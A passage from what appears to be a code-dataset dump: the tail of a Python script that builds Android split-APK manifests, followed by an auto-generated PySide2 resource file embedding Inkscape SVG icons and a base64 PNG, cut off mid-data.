android:hasCode=\"%(has_code)s\">\n </application>\n</manifest>\n\"\"\"\n\ndef ParseArgs():\n \"\"\"Parses command line options.\n\n Returns:\n An options object as from optparse.OptionsParser.parse_args()\n \"\"\"\n parser = optparse.OptionParser()\n build_utils.AddDepfileOption(parser)\n parser.add_option('--main-manifest', help='The main manifest of the app')\n parser.add_option('--out-manifest', help='The output manifest')\n parser.add_option('--split', help='The name of the split')\n parser.add_option(\n '--has-code',\n action='store_true',\n default=False,\n help='Whether the split will contain a .dex file')\n\n (options, args) = parser.parse_args()\n\n if args:\n parser.error('No positional arguments should be given.')\n\n # Check that required options have been provided.\n required_options = ('main_manifest', 'out_manifest', 'split')\n build_utils.CheckOptions(options, parser, required=required_options)\n\n return options\n\n\ndef Build(main_manifest, split, has_code):\n \"\"\"Builds a split manifest based on the manifest of the main APK.\n\n Args:\n main_manifest: the XML manifest of the main APK as a string\n split: the name of the split as a string\n has_code: whether this split APK will contain .dex files\n\n Returns:\n The XML split manifest as a string\n \"\"\"\n\n doc = lxml.etree.fromstring(main_manifest)\n package = doc.xpath('/manifest/@package')[0]\n\n return MANIFEST_TEMPLATE % {\n 'package': package,\n 'split': split.replace('-', '_'),\n 'has_code': str(has_code).lower()\n }\n\n\ndef main():\n options = ParseArgs()\n main_manifest = file(options.main_manifest).read()\n split_manifest = Build(\n main_manifest,\n options.split,\n options.has_code)\n\n with file(options.out_manifest, 'w') as f:\n f.write(split_manifest)\n\n if options.depfile:\n build_utils.WriteDepfile(\n options.depfile,\n [main_manifest] + build_utils.GetPythonDependencies())\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a312eebb329222b44e1ab3e86642b05d53bed49", "content": "# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created: Mon Dec 9 12:39:51 2019\n# by: The Resource Compiler for PySide2 (Qt v5.13.0)\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PySide2 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00\\x10\\xcd\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a<svg\\x0a xm\\\nlns:dc=\\x22http://p\\\nurl.org/dc/eleme\\\nnts/1.1/\\x22\\x0a xml\\\nns:cc=\\x22http://cr\\\neativecommons.or\\\ng/ns#\\x22\\x0a xmlns:\\\nrdf=\\x22http://www.\\\nw3.org/1999/02/2\\\n2-rdf-syntax-ns#\\\n\\x22\\x0a xmlns:svg=\\x22\\\nhttp://www.w3.or\\\ng/2000/svg\\x22\\x0a x\\\nmlns=\\x22http://www\\\n.w3.org/2000/svg\\\n\\x22\\x0a xmlns:sodip\\\nodi=\\x22http://sodi\\\npodi.sourceforge\\\n.net/DTD/sodipod\\\ni-0.dtd\\x22\\x0a xmln\\\ns:inkscape=\\x22http\\\n://www.inkscape.\\\norg/namespaces/i\\\nnkscape\\x22\\x0a widt\\\nh=\\x2248\\x22\\x0a height\\\n=\\x2248\\x22\\x0a viewBox\\\n=\\x220 0 48 48\\x22\\x0a \\\nversion=\\x221.1\\x22\\x0a \\\n id=\\x22svg6\\x22\\x0a so\\\ndipodi:docname=\\x22\\\nzoom_default.svg\\\n\\x22\\x0a inkscape:ve\\\nrsion=\\x220.92.4 (u\\\nnknown)\\x22>\\x0a <met\\\nadata\\x0a id=\\x22m\\\netadata12\\x22>\\x0a \\\n<rdf:RDF>\\x0a \\\n<cc:Work\\x0a \\\n rdf:about=\\x22\\x22>\\x0a\\\n <dc:form\\\nat>image/svg+xml\\\n</dc:format>\\x0a \\\n <dc:type\\x0a \\\n rdf:res\\\nource=\\x22http://pu\\\nrl.org/dc/dcmity\\\npe/StillImage\\x22 /\\\n>\\x0a <dc:ti\\\ntle />\\x0a </c\\\nc:Work>\\x0a </rd\\\nf:RDF>\\x0a </metad\\\nata>\\x0a <defs\\x0a \\\n id=\\x22defs10\\x22 />\\\n\\x0a <sodipodi:nam\\\nedview\\x0a page\\\ncolor=\\x22#ffffff\\x22\\x0a\\\n bordercolor\\\n=\\x22#666666\\x22\\x0a \\\nborderopacity=\\x221\\\n\\x22\\x0a objecttol\\\nerance=\\x2210\\x22\\x0a \\\n gridtolerance=\\x22\\\n10\\x22\\x0a guideto\\\nlerance=\\x2210\\x22\\x0a \\\n inkscape:pageo\\\npacity=\\x220\\x22\\x0a \\\ninkscape:pagesha\\\ndow=\\x222\\x22\\x0a ink\\\nscape:window-wid\\\nth=\\x22902\\x22\\x0a in\\\nkscape:window-he\\\night=\\x22427\\x22\\x0a \\\nid=\\x22namedview8\\x22\\x0a\\\n showgrid=\\x22f\\\nalse\\x22\\x0a inksc\\\nape:zoom=\\x223.4766\\\n083\\x22\\x0a inksca\\\npe:cx=\\x2223.055426\\\n\\x22\\x0a inkscape:\\\ncy=\\x2232.605698\\x22\\x0a \\\n inkscape:win\\\ndow-x=\\x22783\\x22\\x0a \\\n inkscape:window\\\n-y=\\x22162\\x22\\x0a in\\\nkscape:window-ma\\\nximized=\\x220\\x22\\x0a \\\n inkscape:curren\\\nt-layer=\\x22layer1\\x22\\\n />\\x0a <path\\x0a \\\n d=\\x22M0 0h48v48h-\\\n48z\\x22\\x0a id=\\x22pa\\\nth2\\x22\\x0a fill=\\x22\\\nnone\\x22 />\\x0a <circ\\\nle\\x0a style=\\x22o\\\npacity:1;fill:#9\\\n99999;fill-opaci\\\nty:1;stroke:none\\\n;stroke-width:17\\\n.22429085;stroke\\\n-linecap:round;s\\\ntroke-linejoin:b\\\nevel;stroke-mite\\\nrlimit:4;stroke-\\\ndasharray:none;s\\\ntroke-dashoffset\\\n:0;stroke-opacit\\\ny:1;paint-order:\\\nnormal\\x22\\x0a id=\\\n\\x22path1093\\x22\\x0a \\\ncx=\\x2218.237631\\x22\\x0a \\\n cy=\\x2217.87515\\\n4\\x22\\x0a r=\\x2214.58\\\n8048\\x22 />\\x0a <path\\\n\\x0a style=\\x22fil\\\nl:#b3b3b3;fill-r\\\nule:evenodd;stro\\\nke:#999999;strok\\\ne-width:7;stroke\\\n-linecap:round;s\\\ntroke-linejoin:m\\\niter;stroke-mite\\\nrlimit:4;stroke-\\\ndasharray:none;s\\\ntroke-opacity:1\\x22\\\n\\x0a d=\\x22M 23.46\\\n1607,23.808476 4\\\n0.458238,41.4307\\\n5\\x22\\x0a id=\\x22path\\\n1095\\x22\\x0a inksc\\\nape:connector-cu\\\nrvature=\\x220\\x22\\x0a \\\n sodipodi:nodety\\\npes=\\x22cc\\x22 />\\x0a <c\\\nircle\\x0a style\\\n=\\x22opacity:1;fill\\\n:#e6e6e6;fill-op\\\nacity:1;stroke:n\\\none;stroke-width\\\n:15.31822777;str\\\noke-linecap:roun\\\nd;stroke-linejoi\\\nn:bevel;stroke-m\\\niterlimit:4;stro\\\nke-dasharray:non\\\ne;stroke-dashoff\\\nset:0;stroke-opa\\\ncity:1;paint-ord\\\ner:normal\\x22\\x0a \\\nid=\\x22path1093-3\\x22\\x0a\\\n cx=\\x2218.1563\\\n38\\x22\\x0a cy=\\x2217.\\\n843712\\x22\\x0a r=\\x22\\\n12.973715\\x22 />\\x0a \\\n<g\\x0a transfor\\\nm=\\x22matrix(0.5084\\\n7458,0,0,0.50847\\\n458,15.118648,-5\\\n05.88314)\\x22\\x0a \\\nid=\\x22layer1\\x22\\x0a \\\n inkscape:label=\\\n\\x22Capa 1\\x22\\x0a st\\\nyle=\\x22stroke:#00d\\\n4aa\\x22>\\x0a <g\\x0a \\\n id=\\x22g836\\x22\\x0a \\\n transform=\\x22\\\nmatrix(0.6818019\\\n5,0,0,0.68180195\\\n,-10.748023,329.\\\n76841)\\x22>\\x0a <\\\nrect\\x0a st\\\nyle=\\x22fill:none;f\\\nill-opacity:0.84\\\n951453;stroke:#0\\\n0d4aa;stroke-wid\\\nth:3.85741425;st\\\nroke-linejoin:ro\\\nund;stroke-miter\\\nlimit:4;stroke-d\\\nasharray:none\\x22\\x0a \\\n id=\\x22rect\\\n4136\\x22\\x0a w\\\nidth=\\x2244.142586\\x22\\\n\\x0a height\\\n=\\x2244.142586\\x22\\x0a \\\n x=\\x221.92870\\\n71\\x22\\x0a y=\\x22\\\n1006.2909\\x22\\x0a \\\n ry=\\x2210.18675\\\n1\\x22 />\\x0a <g\\x0a \\\n id=\\x22g415\\\n7\\x22\\x0a tran\\\nsform=\\x22matrix(0.\\\n84603094,0,0,0.7\\\n8857975,5.043487\\\n2,217.0903)\\x22\\x0a \\\n style=\\x22fil\\\nl:#999999;stroke\\\n:#00d4aa\\x22>\\x0a \\\n <path\\x0a \\\n sodipodi:nod\\\netypes=\\x22ccc\\x22\\x0a \\\n inkscape\\\n:connector-curva\\\nture=\\x220\\x22\\x0a \\\n id=\\x22path4138\\\n\\x22\\x0a d=\\x22\\\nm 9.1882493,1043\\\n.1259 28.1788757\\\n,-28.9184 v 0\\x22\\x0a \\\n style=\\\n\\x22fill:#999999;fi\\\nll-rule:evenodd;\\\nstroke:#00d4aa;s\\\ntroke-width:4.74\\\n617958;stroke-li\\\nnecap:butt;strok\\\ne-linejoin:miter\\\n;stroke-miterlim\\\nit:4;stroke-dash\\\narray:none;strok\\\ne-opacity:1\\x22 />\\x0a\\\n <path\\x0a \\\n sodipod\\\ni:nodetypes=\\x22ccc\\\nc\\x22\\x0a in\\\nkscape:connector\\\n-curvature=\\x220\\x22\\x0a \\\n id=\\x22pa\\\nth4140-3\\x22\\x0a \\\n d=\\x22m 38.871\\\n283,1019.5549 -6\\\n.563179,-7.2978 \\\n8.297448,-1.8083\\\n z\\x22\\x0a s\\\ntyle=\\x22fill:#00d4\\\naa;fill-rule:eve\\\nnodd;stroke:#00d\\\n4aa;stroke-width\\\n:1px;stroke-line\\\ncap:butt;stroke-\\\nlinejoin:miter;s\\\ntroke-opacity:1\\x22\\\n />\\x0a <pat\\\nh\\x0a sod\\\nipodi:nodetypes=\\\n\\x22cccc\\x22\\x0a \\\n inkscape:conne\\\nctor-curvature=\\x22\\\n0\\x22\\x0a id\\\n=\\x22path4140-3-6\\x22\\x0a\\\n d=\\x22m \\\n6.8693068,1038.4\\\n258 6.5632192,7.\\\n2979 -8.2974502,\\\n1.8083 z\\x22\\x0a \\\n style=\\x22fill\\\n:#00d4aa;fill-ru\\\nle:evenodd;strok\\\ne:#00d4aa;stroke\\\n-width:1px;strok\\\ne-linecap:butt;s\\\ntroke-linejoin:m\\\niter;stroke-opac\\\nity:1\\x22 />\\x0a \\\n</g>\\x0a </g>\\x0a \\\n</g>\\x0a</svg>\\x0a\\\n\\x00\\x00\\x07\\xa4\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a<!-- Creat\\\ned with Inkscape\\\n (http://www.ink\\\nscape.org/) -->\\x0a\\\n\\x0a<svg\\x0a xmlns:d\\\nc=\\x22http://purl.o\\\nrg/dc/elements/1\\\n.1/\\x22\\x0a xmlns:cc\\\n=\\x22http://creativ\\\necommons.org/ns#\\\n\\x22\\x0a xmlns:rdf=\\x22\\\nhttp://www.w3.or\\\ng/1999/02/22-rdf\\\n-syntax-ns#\\x22\\x0a \\\nxmlns:svg=\\x22http:\\\n//www.w3.org/200\\\n0/svg\\x22\\x0a xmlns=\\\n\\x22http://www.w3.o\\\nrg/2000/svg\\x22\\x0a \\\nxmlns:sodipodi=\\x22\\\nhttp://sodipodi.\\\nsourceforge.net/\\\nDTD/sodipodi-0.d\\\ntd\\x22\\x0a xmlns:ink\\\nscape=\\x22http://ww\\\nw.inkscape.org/n\\\namespaces/inksca\\\npe\\x22\\x0a version=\\x22\\\n1.1\\x22\\x0a id=\\x22svg2\\\n\\x22\\x0a width=\\x22192\\x22\\\n\\x0a height=\\x22192\\x22\\\n\\x0a viewBox=\\x220 0\\\n 192 192\\x22\\x0a sod\\\nipodi:docname=\\x22s\\\navec.svg\\x22\\x0a ink\\\nscape:version=\\x220\\\n.92.2 (5c3e80d, \\\n2017-08-06)\\x22>\\x0a \\\n<metadata\\x0a i\\\nd=\\x22metadata8\\x22>\\x0a \\\n <rdf:RDF>\\x0a \\\n <cc:Work\\x0a \\\n rdf:about=\\x22\\\n\\x22>\\x0a <dc:f\\\normat>image/svg+\\\nxml</dc:format>\\x0a\\\n <dc:type\\\n\\x0a rdf:\\\nresource=\\x22http:/\\\n/purl.org/dc/dcm\\\nitype/StillImage\\\n\\x22 />\\x0a <dc\\\n:title />\\x0a \\\n</cc:Work>\\x0a <\\\n/rdf:RDF>\\x0a </me\\\ntadata>\\x0a <defs\\x0a\\\n id=\\x22defs6\\x22 \\\n/>\\x0a <sodipodi:n\\\namedview\\x0a pa\\\ngecolor=\\x22#ffffff\\\n\\x22\\x0a bordercol\\\nor=\\x22#666666\\x22\\x0a \\\n borderopacity=\\\n\\x221\\x22\\x0a objectt\\\nolerance=\\x2210\\x22\\x0a \\\n gridtolerance\\\n=\\x2210\\x22\\x0a guide\\\ntolerance=\\x2210\\x22\\x0a \\\n inkscape:pag\\\neopacity=\\x220\\x22\\x0a \\\n inkscape:pages\\\nhadow=\\x222\\x22\\x0a i\\\nnkscape:window-w\\\nidth=\\x221503\\x22\\x0a \\\n inkscape:window\\\n-height=\\x22616\\x22\\x0a \\\n id=\\x22namedview\\\n4\\x22\\x0a showgrid\\\n=\\x22false\\x22\\x0a in\\\nkscape:zoom=\\x221.2\\\n291667\\x22\\x0a ink\\\nscape:cx=\\x22-192\\x22\\x0a\\\n inkscape:cy\\\n=\\x2296.000006\\x22\\x0a \\\n inkscape:windo\\\nw-x=\\x2257\\x22\\x0a in\\\nkscape:window-y=\\\n\\x2227\\x22\\x0a inksca\\\npe:window-maximi\\\nzed=\\x220\\x22\\x0a ink\\\nscape:current-la\\\nyer=\\x22svg2\\x22 />\\x0a \\\n<path\\x0a style\\\n=\\x22fill:#5555ff;s\\\ntroke-width:1.33\\\n333337\\x22\\x0a d=\\x22\\\nm 37.559322,153.\\\n62712 v -8 h 56 \\\n55.999998 v 8 8 \\\nh -55.999998 -56\\\n z m 28,-52.6666\\\n7 -27.30894,-27.\\\n333331 h 15.6544\\\n71 15.654469 v -\\\n24 -24 h 24 23.9\\\n99998 v 24 24 h \\\n15.65447 15.6544\\\n6 l -27.30893,27\\\n.333331 c -15.01\\\n992,15.03334 -27\\\n.619918,27.33334\\\n -27.999998,27.3\\\n3334 -0.38008,0 \\\n-12.98008,-12.3 \\\n-28,-27.33334 z\\x22\\\n\\x0a id=\\x22path81\\\n7\\x22\\x0a inkscape\\\n:connector-curva\\\nture=\\x220\\x22 />\\x0a</sv\\\ng>\\x0a\\\n\\x00\\x02\\xb4\\x85\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a<!-- Creat\\\ned with Inkscape\\\n (http://www.ink\\\nscape.org/) -->\\x0a\\\n\\x0a<svg\\x0a xmlns:d\\\nc=\\x22http://purl.o\\\nrg/dc/elements/1\\\n.1/\\x22\\x0a xmlns:cc\\\n=\\x22http://creativ\\\necommons.org/ns#\\\n\\x22\\x0a xmlns:rdf=\\x22\\\nhttp://www.w3.or\\\ng/1999/02/22-rdf\\\n-syntax-ns#\\x22\\x0a \\\nxmlns:svg=\\x22http:\\\n//www.w3.org/200\\\n0/svg\\x22\\x0a xmlns=\\\n\\x22http://www.w3.o\\\nrg/2000/svg\\x22\\x0a \\\nxmlns:xlink=\\x22htt\\\np://www.w3.org/1\\\n999/xlink\\x22\\x0a xm\\\nlns:sodipodi=\\x22ht\\\ntp://sodipodi.so\\\nurceforge.net/DT\\\nD/sodipodi-0.dtd\\\n\\x22\\x0a xmlns:inksc\\\nape=\\x22http://www.\\\ninkscape.org/nam\\\nespaces/inkscape\\\n\\x22\\x0a width=\\x2248\\x22\\x0a\\\n height=\\x2248\\x22\\x0a \\\n viewBox=\\x220 0 4\\\n8.000001 48.0000\\\n01\\x22\\x0a id=\\x22svg2\\x22\\\n\\x0a version=\\x221.1\\\n\\x22\\x0a inkscape:ve\\\nrsion=\\x220.92.4 (u\\\nnknown)\\x22\\x0a sodi\\\npodi:docname=\\x22ma\\\np (night).svg\\x22>\\x0a\\\n <defs\\x0a id=\\\n\\x22defs4\\x22>\\x0a <cl\\\nipPath\\x0a cl\\\nipPathUnits=\\x22use\\\nrSpaceOnUse\\x22\\x0a \\\n id=\\x22clipPath\\\n825\\x22>\\x0a <rec\\\nt\\x0a style\\\n=\\x22fill:none;fill\\\n-opacity:0.84951\\\n453;stroke:#9999\\\n99;stroke-width:\\\n3.85741425;strok\\\ne-linejoin:round\\\n;stroke-miterlim\\\nit:4;stroke-dash\\\narray:none\\x22\\x0a \\\n id=\\x22rect827\\\n\\x22\\x0a width\\\n=\\x2244.142586\\x22\\x0a \\\n height=\\x2244\\\n.142586\\x22\\x0a \\\n x=\\x221.9287071\\x22\\x0a\\\n y=\\x221006\\\n.2909\\x22\\x0a \\\nry=\\x2210.186751\\x22 /\\\n>\\x0a </clipPath\\\n>\\x0a </defs>\\x0a <s\\\nodipodi:namedvie\\\nw\\x0a id=\\x22base\\x22\\\n\\x0a pagecolor=\\\n\\x22#ffffff\\x22\\x0a b\\\nordercolor=\\x22#666\\\n666\\x22\\x0a border\\\nopacity=\\x221.0\\x22\\x0a \\\n inkscape:page\\\nopacity=\\x220.0\\x22\\x0a \\\n inkscape:page\\\nshadow=\\x222\\x22\\x0a \\\ninkscape:zoom=\\x223\\\n.959798\\x22\\x0a in\\\nkscape:cx=\\x22-9.39\\\n73628\\x22\\x0a inks\\\ncape:cy=\\x2274.0196\\\n67\\x22\\x0a inkscap\\\ne:document-units\\\n=\\x22px\\x22\\x0a inksc\\\nape:current-laye\\\nr=\\x22layer1-3\\x22\\x0a \\\n showgrid=\\x22fals\\\ne\\x22\\x0a units=\\x22p\\\nx\\x22\\x0a inkscape\\\n:window-width=\\x221\\\n863\\x22\\x0a inksca\\\npe:window-height\\\n=\\x221025\\x22\\x0a ink\\\nscape:window-x=\\x22\\\n57\\x22\\x0a inkscap\\\ne:window-y=\\x2227\\x22\\x0a\\\n inkscape:wi\\\nndow-maximized=\\x22\\\n1\\x22 />\\x0a <metadat\\\na\\x0a id=\\x22metad\\\nata7\\x22>\\x0a <rdf:\\\nRDF>\\x0a <cc:W\\\nork\\x0a rdf\\\n:about=\\x22\\x22>\\x0a \\\n <dc:format>im\\\nage/svg+xml</dc:\\\nformat>\\x0a \\\n<dc:type\\x0a \\\n rdf:resource\\\n=\\x22http://purl.or\\\ng/dc/dcmitype/St\\\nillImage\\x22 />\\x0a \\\n <dc:title /\\\n>\\x0a </cc:Wor\\\nk>\\x0a </rdf:RDF\\\n>\\x0a </metadata>\\x0a\\\n <g\\x0a inksca\\\npe:label=\\x22Capa 1\\\n\\x22\\x0a inkscape:\\\ngroupmode=\\x22layer\\\n\\x22\\x0a id=\\x22layer\\\n1\\x22\\x0a transfor\\\nm=\\x22translate(0,-\\\n1004.3622)\\x22>\\x0a \\\n <g\\x0a id=\\x22l\\\nayer1-3\\x22\\x0a \\\ninkscape:label=\\x22\\\nCapa 1\\x22\\x0a t\\\nransform=\\x22transl\\\nate(-58.464286,-\\\n14.928558)\\x22>\\x0a \\\n <image\\x0a \\\n y=\\x221019.7905\\x22\\\n\\x0a x=\\x2259.\\\n231869\\x22\\x0a \\\n id=\\x22image825\\x22\\x0a \\\n xlink:hr\\\nef=\\x22data:image/p\\\nng;base64,iVBORw\\\n0KGgoAAAANSUhEUg\\\nAAAfQAAAH0CAYAAA\\\nDL1t+KAAAABHNCSV\\\nQICAgIfAhkiAAAIA\\\nBJREFU\\x0aeJzsvXmMb\\\nNl93/c555671dp7v\\\n377DGcjZ0iKpCiKk\\\nklZMmVZkk0LtgnLD\\\nqIkcOD8E8R/KIARJ\\\nEEQ\\x0aBPnDgAUkgYMg\\\nQRQnTmAFZhLIFizB\\\nkSJakk2RIjkmxaFm\\\nRjPz3ryl33u9Vndt\\\ndz8nf9zqpbqru6u6\\\n\\x0aq9d3P8DM6666VXW\\\n76tb5nt8ujDEUFBQ\\\nUFBQUXG7keZ9AQUF\\\nBQUFBwckpBL2goKC\\\ngoOAKUAh6QUFB\\x0aQU\\\nHBFaAQ9IKCgoKCgi\\\ntAIegFBQUFBQVXgE\\\nLQCwoKCgoKrgCFoB\\\ncUFBQUFFwBCkEvKC\\\ngoKCi4AhSC\\x0aXlBQU\\\nFBQcAUoBL2goKCgo\\\nOAKUAh6QUFBQUHBF\\\naAQ9IKCgoKCgitAI\\\negFBQUFBQVXAHXeJ\\\n1BwNtz8\\x0a4peKsXoF\\\nBc8pj3//d8R5n0PB\\\n6SOK8amXk0KgCwoK\\\nTotiA3A5KQT9glMI\\\nd0FBwUWhEPqLTSHo\\\nF4xC\\x0awAsKCi4LhcB\\\nfLApBP2cKAS8oKLg\\\nqFAJ/vhSCfsYUAl5\\\nQUPC8UAj82VII+hl\\\nQiHhBQcHzTiHup08\\\nh\\x0a6KdIIeQFBQUF/R\\\nTCfnoUgj5mChEvKC\\\ngoGI5C3MdLIehjoh\\\nDygoKCguNRCPt4KA\\\nT9BBQiXlBQUDBe\\x0aC\\\nnE/PkUv92Nw84tfM\\\nhddzL8yXer/vWZv/\\\n/w3a5LPOYK/XT/+x\\\n+8MuO3jE8XldFH4h\\\ndLRxzxPfKVc\\x0aaMQW\\\nf3PuYl8cl2F9vagU\\\nFvoIXKSL7C/VbH6j\\\nmRx4f/DgQ9IwRHke\\\npdt3MEIgsgxhDFrt\\\ntPAX3Q5J\\x0au00SBNi\\\n+j5CCqNXG6Gz7GJ3\\\nu/Fx99bXT+YMKTg3\\\ndWKOzvHLg/fZEBVX\\\n2SDY7pO3gyOezJyu\\\noqk/W\\x0ajYhXmyOfj1\\\n0q4d26PfLjxkG6vE\\\nTQaAx9vFQW5ZlZqE\\\n8MvF+vraIqVbTrAi\\\nCyjOb77418Xod9r1\\\nrv\\x0avjPy8x2GVBaVF\\\n1/CiMGbnC+VFb/TS\\\ncf6miehsNiHpxD0I\\\nThvIf9KzeKrzezoA\\\n3sIY+g+fEAahgDU\\x0a\\\nbt7EZJpwcwPLsbGU\\\nTZYkGGOImqMtyPU7\\\nd9GeN9JjCi4GotOm\\\n+fjxvtvtiQqq4pFs\\\nDCfo0lbYUxUs\\x0a1yE\\\nNQrJ2SBbEQ53DeYr\\\n5Ft3798jio8/Xchx\\\nKs7NQqQ6832w0CBo\\\nNLMfGrdYAQdTaJG5\\\n3Rjqfw75T\\x0aotuh+e\\\njRSM+3F8txKL3w4v\\\nbv0eIjbL+EnJoe+j\\\nl+ft7hny8N9xmfFo\\\nWwH00h6Edw3mJ+HG\\\nQU0X6y\\x0auL1oOZUyO\\\ns1IwxDLyZ3lwyxog\\\n/DqdexrC2M714Izp\\\nt2itbjYd9OoFjqAM\\\n11DlT0MhiyMyFrDi\\\nfp5\\x0ae3hEt0P76RPK\\\nH3l5+7aDLGCnUsa9\\\ncWv/c2QZ0fIzkm63\\\nz3t1HLyJOvb84O+T\\\nyDI6Dx8c+7u6xV5B\\\n\\x0av8wUon44RdDzAM4\\\nyjvOVut33e/DgwxO\\\n52Xa7ywHidmfbWs/\\\ni+EQLhFOvH/uxBRe\\\nAShWnUt53s0Gj\\x0a44\\\nNDOHvJuiFxo0XWDp\\\nFS5ZuCqn/oY+zS+c\\\nduTalMeXbu2I8XWh\\\nM+e0LUbJ1YzAHcia\\\nmBt0ePH9F9\\x0a/OjEY\\\ng75epCtLp/4eQ7jl\\\nybPZhJ3EV8/nMJC3\\\n8NZXSw/V5H8Zlv33\\\nSaMoX3v/e2F4rjWT\\\nLa6TLi5\\x0aOZYFZzf+\\\n5CRqbn6sz1lwfsRP\\\nF0nCAFUvIR1FuLg+\\\n8nNIZSE9B1myEZYk\\\na0ekrf1WfnXhOtRq\\\n4zjt\\x0a02Fzg9azZ30\\\n3WY5D+do1dBRheT7\\\nGcYiWnhI1W2N5SeV\\\n5+Hfu7rs9efaUcHN\\\nzLK+xl/LMDHJ65lS\\\ne\\x0a+zwoLPZ+CkHfQd\\\nz84pf00Ycdn897gj\\\n8MB7/f8dPFvoXiJK\\\n7JrYS4ceHWqjgLN8\\\nb2fAUXBxF1icIm\\x0aJ\\\nsowUYZTqSAnc6txF\\\nC+R5TtYFQ+hJOlGl\\\nyyIkcrCq9cRQl4KE\\\nRl38tlR1F94Ee3sr\\\nxc5zfNQnkfp\\x0a5i2M\\\nZZ3aa+zmJ0qS3+ue\\\n6rLK49//HQkUQgac\\\njZ/kgnNWVvlBYj7u\\\nL7BbqWD7PnGnc2KX\\\nnV0qFWJ+\\x0ahTFuCcc\\\n9uSt8K35u18tY1Tz\\\nBS9ku1szx3dunxX9\\\nZifnv2g5re25Xnjf\\\nWjfBRDBLz0yYNQwg\\\nDKFfO\\x0a5PVOW8wBtg\\\nyxwlp/zgX9NIX8MG\\\nt8L06l3JcZW124fr\\\nwXbbfoLD3Dn5hE2u\\\nP5aM87I7ng8iCFQg\\\nmH\\x0azNMoy8WqDZ9Ff\\\nZb8F+3BQuqUS2cm6\\\nIPyGADkKb++8jw4o\\\nFztrBhlbRyFrfX8e\\\nRb25zYp7rSt8qMu\\x0a\\\nWJFl2/9adr7ASGXl\\\nX/RjxhqDtTV0mtFZ\\\nXaWzvHJi67z+kZdO\\\n9PiCy0u2uozyPKQa\\\nzjWrPA9/agpR\\x0am0R\\\niXVgx343otPu8Y0K\\\nczXJo+Q7u5OC69qT\\\nbwq6XUVUfq+Se6HW\\\nksrA8B8tztj9Hy7G\\\nJNjdO9Lwn\\x0aZWtt/N\\\nQpNaJ6npPmnssY+n\\\nl/4OnyEnGng1SKLI\\\n6wHBchJTpNKc3NYf\\\nzjuUCjxUcj18DuRS\\\noLIa0r\\x0aU+ZSMDxmo\\\n4GQEmp1hDHES8+IO\\\n+0Dkyt3l0CW52aRk\\\nxdfxLcQxuxrrHIWM\\\nXTLc7BqHn59Fi3tf\\\nffH\\x0aG8+w3N77msSk\\\nmwFZNxrpNaRtIV0H\\\noSyEnYumDhJ0GKM8\\\nD29q+thrzGXiebTU\\\nnyuX+3kL+RZ2tUoS\\\n\\x0aBCTdbl8davLsKUJ\\\nax87uGIeYe/X6hYx\\\n7Fpw+YmJy+2cjBE6\\\n9jjGaNIxQnksWJxi\\\ntMTpDpxlutYI9\\x0aMd\\\nXXefCycFCXtHEjlQ\\\nUCpOtgtEZVfYSSA8\\\nVcZnl3tiyKQeYbJj\\\nEpITXb7/mRr+coVL\\\nWE5TsgwGgD\\x0aGKSjS\\\nOnF0L3DywuvCs+jC\\\n/7yfROPyUURcwDjl\\\n3ArFXSa4MzObwt43\\\nGkjpDxWaVj89MmJz\\\nkkqC7tU\\x0aLsS8YBvj\\\nl3D80r6+/TKKMFmK\\\nKZU5/ZSn8eMAZ9nz\\\nzKr62NUSJtMIS5I0\\\nOtgDctK6T56QdLtA\\\n/n3U\\x0aFR9V8bA8h7Q\\\n7XMMfq+Jh10qES41\\\nty14qC3umijNVJWt\\\nHZ7aZuSjc/OKXzPM\\\ni6s9FDH2cYv5zlfG\\\nU\\x0ae0TtNsrzMXLnI7\\\nAc99h13s7Cdcozxy\\\nsNymP3FZzjJuMVXE\\\nkOcqBr18WUBid1XQ\\\nbOuoGpXS+RbHbR\\x0aa\\\nUrS7GI7+9u8yjTdF\\\nnPI5yfoMEZIiRlly\\\ndGgk3Sfm16EBtup4\\\nsw+n10eL5JBd5pca\\\nUEfZ1ehLSvl\\x0aN9vj\\\nadbi37mL0f32jT81\\\nuGvUMPxKLUZOz2CX\\\nSnmzjyGSmbaO8ycm\\\nD2w/WfD8sres6ypz\\\nmvFzISRZ\\x0aJyB6tkH\\\nSaGNNz/bdL5OEzQ/\\\ne3/c4ozU6S1HlEWY\\\nnGIPJ9jSskhb2/AJ\\\n/1Ts/I1UEXWQ0Wi7\\\nAuHke\\x0ausxdWUEf9w\\\nd3Grv63SVhv1KLMS\\\neoDf3lpsPfqyZ4t2\\\n5Tnp1HyKMFXXke/u\\\nQU6oDhEwUFBadP6+\\\nGH\\x0ag+/QhqwbI6wRl\\\nmkh9h1vdEa6vMRXk\\\n/OLsBq/tD2R7ry5y\\\nqJ+JQV9XB/YL03vT\\\n1wZJ2ZjZ4zjLzeP\\x0a\\\n32RCBLmr7u+2eudb\\\nq+GUD3eJVl99DffG\\\nLeTUNNp1+Z+nYn7B\\\nvjgjEwsKzowzLuOS\\\nSdL382HJblkn\\x0aHFr\\\nQVdVHuoqkuZMc609\\\nOUv7Iy6i5eaaB/35\\\ni+H79x2ZzA5FlyDB\\\nEN8br53lZjcfLcFV\\\nF/colxY3z\\x0ag/pHa6\\\nd48bdbiBNmBwtj0J\\\nsbdBsNpFLYvred1J\\\naO6N7699fPvmtVQc\\\nFFQJ5SPoBUFqrkQ9\\\na/JHWe\\x0aLO70cNcHp\\\nxXqNEPagz1tVsnNB\\\ndxWIADTS6TTmmRtp\\\n4V0EgTbi/wa8PiUE\\\nwj02irBRgO5sYHRG\\\nm9i\\x0acL39cXkvHZ8O\\\nX8VkuStVhz4OMf+F\\\nqsWvt8Y71GTchI8e\\\n4lTKmCyju7YzUEMq\\\nC7day+tXw/DQnb9b\\\n\\x0aq+L0FjKhFELZF8Y\\\nlVlBw1oSPHvYlpY0\\\nDqaxe1nmZ8OkaOtn\\\n5Pm7NajhqEIu0Lby\\\nb06RrXUymkWUH\\x0aYU\\\nmEJTFxhkl7GwIBCI\\\nFJMuLNHUGXykJ53s\\\nAxsONm7zwKu1Q61U\\\n6TX6kpvto8uVfxKo\\\nn6lRH0q+pC\\x0aOYit5\\\njTH7Qa